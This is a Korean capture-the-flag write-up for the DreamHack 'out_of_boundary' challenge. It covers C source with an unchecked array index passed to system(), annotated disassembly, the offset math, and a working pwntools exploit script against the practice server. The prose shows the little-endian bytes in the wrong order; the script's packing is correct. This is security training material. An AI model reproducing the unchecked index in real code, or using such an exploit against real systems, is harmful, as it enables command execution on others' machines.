DreamHack - out_of_boundary 풀이

 

out_of_boundary.c

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>

char name[16];

char *command[10] = { "cat",
    "ls",
    "id",
    "ps",
    "file ./oob" };
void alarm_handler()
{
    puts("TIME OUT");
    exit(-1);
}

void initialize()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main()
{
    int idx;

    initialize();

    printf("Admin name: ");
    read(0, name, sizeof(name));
    printf("What do you want?: ");

    scanf("%d", &idx);

    system(command[idx]);

    return 0;
}

 

gdb Code

   0x080486e7 <+28>:    call   0x804867b <initialize>
   0x080486ec <+33>:    sub    esp,0xc
   0x080486ef <+36>:    push   0x8048811 # "Admin name: "
   0x080486f4 <+41>:    call   0x80484b0 <printf@plt>
   0x080486f9 <+46>:    add    esp,0x10
   0x080486fc <+49>:    sub    esp,0x4
   0x080486ff <+52>:    push   0x10
   0x08048701 <+54>:    push   0x804a0ac # name
   0x08048706 <+59>:    push   0x0
   0x08048708 <+61>:    call   0x80484a0 <read@plt>
   0x0804870d <+66>:    add    esp,0x10
   0x08048710 <+69>:    sub    esp,0xc
   0x08048713 <+72>:    push   0x804881e # "What do you want?: "
   0x08048718 <+77>:    call   0x80484b0 <printf@plt>
   0x0804871d <+82>:    add    esp,0x10
   0x08048720 <+85>:    sub    esp,0x8
   0x08048723 <+88>:    lea    eax,[ebp-0x10]
   0x08048726 <+91>:    push   eax # &idx
   0x08048727 <+92>:    push   0x8048832 # "%d"
   0x0804872c <+97>:    call   0x8048540 <__isoc99_scanf@plt>
   0x08048731 <+102>:   add    esp,0x10
   0x08048734 <+105>:   mov    eax,DWORD PTR [ebp-0x10] # idx
   0x08048737 <+108>:   mov    eax,DWORD PTR [eax*4+0x804a060] # command[idx]
   0x0804873e <+115>:   sub    esp,0xc
   0x08048741 <+118>:   push   eax # command[idx]
   0x08048742 <+119>:   call   0x8048500 <system@plt>

우선 gdb로 코드 영역에 필요한 부분에 한눈에 보이기 쉽게 옆에다 주석을 적었다. 

 

각 변수의 주소 값은 아래 표와 같다. 

변수	주소
name	0x804a0ac
*command	0x804a060

두 변수의 차를 계산하면 4C(76)이 나온다. 4로 나누면(32비트 환경에 포인트 크기는 4바이트 단위이므로) 19가 나오므로 변수 간에 19만큼의 오프셋이 존재한다. 

 

사용자에게 두 번째로 입력받는 idx 값을 19로 주게 되면 OOB(Out Of Boundary)가 발생하여 name을 가리키게 된다. 

command[19] ==> name

 

이제 마지막으로 넘어가 system 함수의 인자로 command[19]를 넘기는데 여기서 주의할 것은 system 함수의 인자 값으로 명령어 문자열이 아닌 명령어 문자열의 주소값을 전달 해야 한다.

 

그러므로 처음에 name을 입력할 때는 "{name+4의 주소 값}cat flag"을 넣어야 한다. 

name의 주소 값은 0x804a0ac이었으니 여기다 +4를 하면 0x804a0B0이다. 

 

리틀 엔디언으로 계산하면 name 입력 값은 다음과 같다. 

b"\x08\x04\xa0\xB0cat flag"

 

exploit.py

from pwn import *

rem = remote('host3.dreamhack.games', 17129)

payload = p32(0x804a0ac+4)
payload += b"cat flag"

rem.sendlineafter("Admin name: ", payload)

rem.sendlineafter("What do you want?: ", b"19")

flag = rem.recv(100).decode('utf-8')
print(flag)

 

 

 

참고: 

https://dreamhack.io/learn/2/14#10

로그인 | Dreamhack